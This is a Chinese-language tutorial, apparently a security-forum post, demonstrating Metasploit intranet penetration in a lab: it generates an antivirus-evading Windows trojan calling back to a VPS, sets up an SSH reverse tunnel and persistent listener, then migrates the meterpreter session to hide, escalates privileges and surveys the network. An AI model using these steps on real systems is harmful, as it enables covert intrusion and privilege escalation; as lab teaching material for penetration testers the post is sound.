Metasploit

0x00. Metasploit Framework简介

  Metasploit是目前最流行、最强大、最具扩展性的渗透测试平台软件,是笔者最崇拜也最喜欢的工具没有之一,下面我将用msf给大家带来一场盛大的内网渗透体验,别眨眼噢!


0x01. 实战操作

环境准备:

1. 靶机win 7   IP=192.168.43.150

2. kali linux   IP=192.168.43.153

3. VPS服务器   IP=xx.xx.xx.xx

实战演示:

1. 先用evil-evasion生成具有一定免杀功能的windows木马,监听地址设成VPS的地址(打码防D),然后将VPS上的2333端口映射到内网kali的2333端口,同时还要修改VPS上的ssh配置,不然别人是连不上VPS的(在实战中自己常常在内网,所以这里介绍一下VPS)

vi /etc/ssh/sshd_config && GatewayPorts:yes

ssh -CfNg -R xx.xx.xx.xx:2333:192.168.43.153:2333 root@xx.xx.xx.xx -p 29402

2. 启动kali设置msf监听,lport=2333,lhost=192.168.43.153(注意:这里的监听地址是kali的地址,不是VPS的),关于msf的基本操作网上有很多,这里不过多介绍,大家可以参考这个系列文章

[*]如果想要在docker启动持续监听可以用如下命令

set exitonsession false && run -j

3. 在win 7 中执行木马

4. 接收到meterpreter之后就应该将自己的进程迁移到一个隐蔽的进程中去,防止被查杀,这里笔者迁移到win 7的桌面进程

migrate 1988 && getpid

5. 查看当前权限、系统信息,并尝试提权

getuid && sysinfo && getsystem

6. 查看网络、路由信息

ifconfig && route

点击收藏 | 2 关注 | 0
登录 后跟帖